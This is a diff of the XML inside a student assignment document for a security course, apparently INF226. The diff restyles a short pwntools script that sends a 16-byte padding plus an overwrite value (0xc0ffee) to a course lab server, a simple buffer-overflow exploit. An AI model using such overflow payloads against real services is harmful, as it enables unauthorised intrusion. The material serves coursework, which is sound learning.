--- a/CA1/CA1_INF226_fha040.docx
+++ b/CA1/CA1_INF226_fha040.docx
@@ -773,17 +773,24 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="6A9955"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
           <w14:ligatures w14:val="none"/>
         </w:rPr>
         <w:t>#!/usr/bin/python3</w:t>
@@ -791,164 +798,962 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>from pwn import *</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>io = remote('inf226.puffling.no', 7000)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>line = b'A' * 16 + b'\xee\xff\xc0\x00'</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>io.sendline(line)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t> </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
-          <w:kern w:val="0"/>
-          <w14:ligatures w14:val="none"/>
-        </w:rPr>
-        <w:t>print(io.recvall())</w:t>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>from</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="4EC9B0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>pwn</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>import</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>*</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>from</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="4EC9B0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>pwn</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="C586C0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>import</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> p64</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>io</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="4EC9B0"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>remote</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CE9178"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>'inf226.puffling.no'</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="B5CEA8"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>7000</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>line</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>cyclic</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="B5CEA8"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>16</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>+</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> p64(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="569CD6"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>0x</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="B5CEA8"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>c0ffee</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="0" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="9CDCFE"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>io</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>sendline</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="DCDCAA"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>line</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="1F1F1F"/>
+        <w:spacing w:after="240" w:line="285" w:lineRule="atLeast"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
+          <w:color w:val="CCCCCC"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+          <w14:ligatures w14:val="none"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
